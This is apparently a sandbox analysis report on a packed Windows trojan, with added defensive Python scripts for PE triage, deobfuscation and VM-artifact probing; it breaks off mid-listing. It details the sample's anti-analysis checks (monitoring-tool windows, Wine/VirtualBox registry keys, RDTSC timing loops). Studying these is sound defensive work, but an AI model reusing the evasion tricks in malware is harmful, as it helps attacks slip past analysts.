Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7073C
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 007D4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: smwmjzky ZLIB complexity 0.9950201620655184
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_007F3A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007ECAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_007ECAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9CM3DEM8.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1771008 > 1048576
Source: file.exe | Static PE information: Raw size of smwmjzky is bigger than: 0x100000 < 0x196600

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.7d0000.0.unpack | section rights: <unnamed>:EW; .rsrc:W; .idata:W; <unnamed>:EW; smwmjzky:EW; galsdkjy:EW; .taggant:EW; vs <unnamed>:ER; .rsrc:W; .idata:W; <unnamed>:EW; smwmjzky:EW; galsdkjy:EW; .taggant:EW; (only the first unnamed section differs: EW vs ER)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F6390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b8bc4 should be: 0x1b79e2
Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: file.exe | Static PE information: section name: smwmjzky
Source: file.exe | Static PE information: section name: galsdkjy
Source: file.exe | Static PE information: section name: .taggant
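The static findings above (a non-zero PE checksum that does not match the image, blank and non-standard section names, an entry point inside .taggant rather than a code section, and a section whose ZLIB complexity is close to 1.0) are cheap to reproduce without a sandbox. The Python below is an added example, not code from the report or from Joe Sandbox: it implements the standard PE checksum (the 16-bit word sum plus file length that imagehlp's CheckSumMappedFile computes), lists section names that are non-standard or not printable, locates the section that holds the entry point, and measures per-section compressibility with zlib. Because the analysed sample is not reproduced here, build_pe() fabricates a minimal PE32 with the same traits as constructed test data; the 0.99 packed-ratio cut-off, the set of "standard" section names and the set of code-section names are this example's assumptions, not Joe Sandbox's thresholds.

```python
import hashlib
import struct
import zlib

STANDARD_SECTIONS = {b".text", b".data", b".rdata", b".idata", b".edata", b".rsrc",
                     b".reloc", b".bss", b".tls", b".pdata", b".CRT"}
CODE_SECTIONS = {b".text", b"CODE"}   # where an entry point normally lives (assumption)
PACKED_RATIO = 0.99                   # assumed cut-off, not Joe Sandbox's threshold


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """16-bit ones'-complement word sum skipping the CheckSum dword, plus file length."""
    total = 0
    for i in range(0, len(data) & ~1, 2):
        if i in (checksum_off, checksum_off + 2):
            continue
        total += data[i] | (data[i + 1] << 8)
    if len(data) & 1:
        total += data[-1]
    while total >> 16:                        # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (total + len(data)) & 0xFFFFFFFF


def parse_pe32(data: bytes) -> dict:
    """Pull the header fields the checks need; PE32 (32-bit) images only."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled")
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "vaddr": vaddr, "vsize": vsize,
                         "raw": data[rawptr:rawptr + rawsize], "chars": chars})
    return {"machine": machine, "sections": sections,
            "entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_off": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0]}


def zlib_ratio(raw: bytes) -> float:
    """compressed/raw size; near 1.0 means the bytes are already compressed or encrypted."""
    return len(zlib.compress(raw, 9)) / len(raw) if raw else 0.0


def triage(data: bytes) -> dict:
    pe = parse_pe32(data)
    secs = pe["sections"]
    entry = next((s for s in secs if s["vaddr"] <= pe["entry_rva"]
                  < s["vaddr"] + max(s["vsize"], len(s["raw"]))), None)
    return {
        # A zero CheckSum is normal for user-mode EXEs; a non-zero one has to match.
        "invalid_checksum": pe["stored_checksum"] not in (0, pe_checksum(data, pe["checksum_off"])),
        "nonstandard_sections": [s["name"] for s in secs if s["name"] not in STANDARD_SECTIONS],
        "special_char_sections": [s["name"] for s in secs
                                  if not s["name"] or not all(0x21 <= c < 0x7F for c in s["name"])],
        "entry_section": entry["name"] if entry else None,
        "entry_outside_code": entry is None or entry["name"] not in CODE_SECTIONS,
        "packed_sections": [s["name"] for s in secs if zlib_ratio(s["raw"]) >= PACKED_RATIO],
    }


def with_checksum(data: bytes, value: int) -> bytes:
    """Copy of data with the optional-header CheckSum field set to value."""
    out = bytearray(data)
    struct.pack_into("<I", out, parse_pe32(data)["checksum_off"], value)
    return bytes(out)


def build_pe(sections, entry_rva, checksum=0, file_align=0x200, sect_align=0x1000) -> bytes:
    """Constructed minimal PE32: DOS header, COFF header, optional header, section table."""
    hdr_size = -(-(0x40 + 4 + 20 + 224 + 40 * len(sections)) // file_align) * file_align
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    hdrs, body, rva, raw_ptr = b"", b"", sect_align, hdr_size
    for name, raw, chars in sections:
        padded = raw + b"\0" * (-len(raw) % file_align)
        hdrs += struct.pack("<8sIIIIIIHHI", name[:8].ljust(8, b"\0"), len(raw), rva,
                            len(padded), raw_ptr, 0, 0, 0, 0, chars)
        body, raw_ptr = body + padded, raw_ptr + len(padded)
        rva += -(-len(raw) // sect_align) * sect_align
    fields = [0x10B, 14, 0, 0, 0, 0, entry_rva, sect_align, 0, 0x400000, sect_align, file_align,
              6, 0, 0, 0, 6, 0, 0, rva, hdr_size, checksum, 2, 0,
              0x100000, 0x1000, 0x100000, 0x1000, 0, 16]
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6, *fields) + b"\0" * 128
    image = dos + b"PE\0\0" + coff + opt + hdrs
    return image + b"\0" * (hdr_size - len(image)) + body


def demo_sample() -> bytes:
    """Constructed stand-in: unnamed section, incompressible non-standard section with the
    entry point, wrong CheckSum. Not the analysed file."""
    seed, blob = b"seed", b""
    while len(blob) < 0x400:                  # deterministic, incompressible filler
        seed = hashlib.sha256(seed).digest()
        blob += seed
    secs = [(b".text", b"\x90" * 0x200, 0x60000020),   # CODE | EXECUTE | READ
            (b"", b"\0" * 0x100, 0xC0000040),          # INITIALIZED_DATA | READ | WRITE
            (b".taggant", blob[:0x400], 0xE0000020)]   # CODE | EXECUTE | READ | WRITE
    return build_pe(secs, entry_rva=0x3010, checksum=0x1B8BC4)   # CheckSum deliberately wrong
```

triage(open(path, "rb").read()) runs the same checks on a real 32-bit file; triage(demo_sample()) shows the constructed stand-in tripping all four. A zero CheckSum is not flagged because user-mode executables are not required to carry one; the report's finding is specifically a non-zero value that does not match, which is what with_checksum() lets you toggle while the rest of the image stays identical.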
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C530DF push ebx; mov dword ptr [esp], esi (0_2_00C53101)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E5 push 163386C3h; mov dword ptr [esp], ebx (0_2_00C18100)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2A889 push edx; mov dword ptr [esp], eax (0_2_00C2A8E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2A889 push 77AFB84Bh; mov dword ptr [esp], edi (0_2_00C2A91D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2A889 push eax; mov dword ptr [esp], 4AAF8F00h (0_2_00C2A9B2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2B04E push 3E55FA47h; mov dword ptr [esp], edx (0_2_00C2B092)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1284C push ebp; mov dword ptr [esp], ebx (0_2_00C12893)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1284C push edi; mov dword ptr [esp], 70C9D589h (0_2_00C128A5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3085B push 2757F547h; mov dword ptr [esp], ecx (0_2_00C30889)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push eax; mov dword ptr [esp], esi (0_2_00B93828)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 053795FFh; mov dword ptr [esp], esi (0_2_00B9383E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 7D5E545Fh; mov dword ptr [esp], edx (0_2_00B93846)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 3FD02B49h; mov dword ptr [esp], esp (0_2_00B938C5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 333B07A6h; mov dword ptr [esp], edx (0_2_00B938CE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push edx; mov dword ptr [esp], edi (0_2_00B93965)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 2B0A921Ah; mov dword ptr [esp], ebx (0_2_00B9396D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 41D38F0Eh; mov dword ptr [esp], ecx (0_2_00B93980)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push esi; mov dword ptr [esp], 55657D85h (0_2_00B939E0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 09CD2A55h; mov dword ptr [esp], ebx (0_2_00B93AAD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push eax; mov dword ptr [esp], esi (0_2_00B93B1C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push ebp; mov dword ptr [esp], ebx (0_2_00B93B5C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 7DBB65B2h; mov dword ptr [esp], ecx (0_2_00B93B7A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push esi; mov dword ptr [esp], 7FEB6B9Ah (0_2_00B93B9C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 302DF339h; mov dword ptr [esp], esi (0_2_00B93BE0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push ebp; mov dword ptr [esp], 75FB3ADCh (0_2_00B93BE4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push ebx; mov dword ptr [esp], ecx (0_2_00B93CE0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push ecx; mov dword ptr [esp], 71A41B68h (0_2_00B93D43)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 5C1FACF0h; mov dword ptr [esp], eax (0_2_00B93E4B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push ebx; mov dword ptr [esp], 58EB6125h (0_2_00B93E4F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push eax; mov dword ptr [esp], edi (0_2_00B93E66)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 2E261AEEh; mov dword ptr [esp], edi (0_2_00B93ECE)
              Source: file.exeStatic PE information: section name: smwmjzky entropy: 7.9542409531412455
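The rows above are all instances of one pattern, `push A; mov dword ptr [esp], B`, which is how this packer hides a plain `push B`: the pushed operand A is dead the moment it is written, so the immediates in these rows (163386C3h, 77AFB84Bh and so on) are not real constants and make poor YARA material. The following Python script is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses rows in the layout shown here (and the fused form the raw extraction produced), rewrites each pair to its one-instruction equivalent, and lists the dead immediates. The row format and the Joe Sandbox `pid_thread_address` notation are assumed from what is visible above; the `esp` case is the one pair that is not a plain substitution.

```python
"""Rewrite the `push A; mov dword ptr [esp], B` pairs listed in the report to the
single instruction each pair is equivalent to."""
import re
from typing import List, NamedTuple, Optional, Tuple

REGS32 = {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"}

# One evidence row from the report. The trailing address (the site of the pair) may be
# fused directly onto the operand, as in the raw extraction, or separated by whitespace.
ROW_RE = re.compile(
    r"Code function:\s*(?P<func>\d+_\d+_[0-9A-Fa-f]{8})\s+"
    r"push (?P<pushed>[^;]+?);\s*mov dword ptr \[esp\],\s*(?P<stored>\S+?)"
    r"\s*(?P<site>\d+_\d+_[0-9A-Fa-f]{8})?\s*$"
)


class PushMov(NamedTuple):
    func: str            # function start, Joe Sandbox "pid_thread_address" notation
    site: Optional[str]  # address of the pair inside the function
    pushed: str          # operand A: dead value, overwritten before it is ever read
    stored: str          # operand B: the value that actually ends up on the stack


def parse_row(line: str) -> Optional[PushMov]:
    m = ROW_RE.search(line.replace(" | ", " "))
    if not m:
        return None
    return PushMov(m["func"], m["site"], m["pushed"].strip(), m["stored"].strip())


def simplify(p: PushMov) -> str:
    # `push A; mov [esp], B` leaves B in the new top-of-stack slot, so it is `push B`,
    # except when B is esp: the mov stores esp *after* the push decremented it by 4,
    # whereas a real `push esp` stores the value from before the decrement.
    if p.stored == "esp":
        return "push esp; sub dword ptr [esp], 4"
    return f"push {p.stored}"


def deobfuscate(lines) -> List[Tuple[str, Optional[str], str]]:
    out = []
    for line in lines:
        p = parse_row(line)
        if p is not None:
            out.append((p.func, p.site, simplify(p)))
    return out


def junk_immediates(lines) -> List[str]:
    """Immediates that are pushed only to be overwritten. They never influence execution,
    so they should be excluded from string hunting and signature constants."""
    return [p.pushed for p in map(parse_row, lines) if p is not None and p.pushed not in REGS32]


# Constructed input: four evidence rows copied from this report plus one unrelated row.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C530DF push ebx; mov dword ptr [esp], esi | 0_2_00C53101",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E5 push 163386C3h; mov dword ptr [esp], ebx | 0_2_00C18100",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2A889 push eax; mov dword ptr [esp], 4AAF8F00h | 0_2_00C2A9B2",
    r"Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824 push 3FD02B49h; mov dword ptr [esp], esp | 0_2_00B938C5",
    r"Source: file.exe | Static PE information: section name: .taggant",
]

if __name__ == "__main__":
    for func, site, ins in deobfuscate(SAMPLE_ROWS):
        print(f"{func} @ {site}: {ins}")
    print("dead immediates:", junk_immediates(SAMPLE_ROWS))
```

Run against the full evidence list rather than the four sample rows, the output is the real push sequence of each function, which is what you want in front of you before deciding whether 0_2_00B93824 is the unpacking stub or the Stealc entry.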

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_007F6390
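A sandbox operator reading this section wants to know whether their own analysis image would trip these checks. The script below is an added example for this page, not code from the report or from the sample: it runs the same probes the sample runs, FindWindowW on the three window classes above (the Sysinternals Filemon, Procmon and Regmon windows) and, for the two keys the report lists under Malware Analysis System Evasion, an open of HKEY_CURRENT_USER\Software\Wine and HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__. It also reads GetUserDefaultLangID, which the report shows feeding an ExitProcess decision; the report does not say which language IDs trigger the exit, so the value is only displayed. The decision logic sits in a pure function so it can be tested off-box; the probes themselves need the Windows API.

```python
"""Check whether an analysis VM exposes the artifacts this sample looks for."""
import ctypes
import sys
from typing import Dict, Iterable, Set

# Taken from the report: window classes of monitoring tools the sample searches for,
# and the two registry keys it opens to recognise Wine and VirtualBox.
MONITOR_WINDOW_CLASSES = ("FilemonClass", "PROCMON_WINDOW_CLASS", "RegmonClass")
VM_REGISTRY_KEYS = (
    ("HKEY_CURRENT_USER", r"Software\Wine"),
    ("HKEY_LOCAL_MACHINE", r"HARDWARE\ACPI\DSDT\VBOX__"),
)


def probe_windows(classes: Iterable[str] = MONITOR_WINDOW_CLASSES) -> Set[str]:
    """FindWindowW by class name, exactly what the sample does. Windows only."""
    user32 = ctypes.windll.user32
    user32.FindWindowW.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p]
    user32.FindWindowW.restype = ctypes.c_void_p
    return {cls for cls in classes if user32.FindWindowW(cls, None)}


def probe_registry(keys=VM_REGISTRY_KEYS) -> Set[str]:
    """Open each key read-only; a successful open is the tell, the contents are irrelevant."""
    import winreg  # Windows only
    roots = {"HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER,
             "HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE}
    found = set()
    for root, sub in keys:
        try:
            winreg.CloseKey(winreg.OpenKey(roots[root], sub, 0, winreg.KEY_READ))
            found.add(f"{root}\\{sub}")
        except OSError:
            pass
    return found


def probe_langid() -> int:
    """The LANGID the sample feeds into its GetUserDefaultLangID -> ExitProcess decision.
    The report does not state which values trigger the exit, so it is only reported."""
    return ctypes.windll.kernel32.GetUserDefaultLangID() & 0xFFFF


def evaluate(found_windows: Set[str], found_keys: Set[str]) -> Dict[str, object]:
    """Pure decision logic, testable off-box: which of the sample's checks would fire,
    and under which report signature each one is filed."""
    hits = []
    for cls in sorted(found_windows):
        hits.append((cls, "Tries to detect process monitoring tools"))
    for key in sorted(found_keys):
        hits.append((key, "Tries to detect sandboxes / dynamic malware analysis system (registry check)"))
    return {"hits": hits, "exposed": bool(hits)}


def run_probe() -> Dict[str, object]:
    if sys.platform != "win32":
        raise RuntimeError("this probe needs the Windows API; run it inside the analysis VM")
    result = evaluate(probe_windows(), probe_registry())
    result["langid"] = probe_langid()
    return result


if __name__ == "__main__":
    print(run_probe())
```

Run it inside the VM with Procmon open and it reports PROCMON_WINDOW_CLASS as exposed; on a VirtualBox guest the DSDT\VBOX__ key fires regardless of what is running, which is why that artifact has to be fixed at the hypervisor (ACPI table) level rather than in the guest.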

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25630
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A201C4 second address: A201D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D0Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A201D7 second address: A201DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A201DD second address: A201E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A201E1 second address: A1FAAE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jp 00007F893453D39Dh 0x00000015 jmp 00007F893453D397h 0x0000001a push dword ptr [ebp+122D1091h] 0x00000020 jne 00007F893453D387h 0x00000026 call dword ptr [ebp+122D2BC3h] 0x0000002c pushad 0x0000002d jmp 00007F893453D393h 0x00000032 xor eax, eax 0x00000034 sub dword ptr [ebp+122D19BFh], ecx 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e sub dword ptr [ebp+122D19BFh], esi 0x00000044 mov dword ptr [ebp+122D2904h], eax 0x0000004a add dword ptr [ebp+122D19BFh], edx 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D19BFh], edx 0x0000005b sub dword ptr [ebp+122D3525h], esi 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 pushad 0x00000066 jne 00007F893453D38Ch 0x0000006c popad 0x0000006d lodsw 0x0000006f mov dword ptr [ebp+122D2045h], eax 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 cld 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D3525h], ebx 0x00000084 nop 0x00000085 push ecx 0x00000086 jmp 00007F893453D395h 0x0000008b pop ecx 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f push edx 0x00000090 push eax 0x00000091 push edx 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1FAAE second address: A1FAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97693 second address: B97699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97699 second address: B9769F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9769F second address: B976A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97C55 second address: B97C7D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8934532D08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F8934532D08h 0x00000014 pushad 0x00000015 jno 00007F8934532D06h 0x0000001b pushad 0x0000001c popad 0x0000001d jl 00007F8934532D06h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97C7D second address: B97C86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97C86 second address: B97C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97C8C second address: B97C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B97DEC second address: B97DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A475 second address: B9A491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D398h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A491 second address: B9A4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8934532D19h 0x00000011 jmp 00007F8934532D13h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A4B5 second address: B9A4E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007F893453D386h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ecx 0x00000018 jg 00007F893453D386h 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jno 00007F893453D388h 0x00000029 jc 00007F893453D38Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A4E8 second address: A1FAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F8934532D0Ch 0x0000000e pop eax 0x0000000f mov dword ptr [ebp+122D2045h], esi 0x00000015 push dword ptr [ebp+122D1091h] 0x0000001b xor dh, 00000009h 0x0000001e call dword ptr [ebp+122D2BC3h] 0x00000024 pushad 0x00000025 jmp 00007F8934532D13h 0x0000002a xor eax, eax 0x0000002c sub dword ptr [ebp+122D19BFh], ecx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 sub dword ptr [ebp+122D19BFh], esi 0x0000003c mov dword ptr [ebp+122D2904h], eax 0x00000042 add dword ptr [ebp+122D19BFh], edx 0x00000048 mov esi, 0000003Ch 0x0000004d mov dword ptr [ebp+122D19BFh], edx 0x00000053 sub dword ptr [ebp+122D3525h], esi 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d pushad 0x0000005e jne 00007F8934532D0Ch 0x00000064 popad 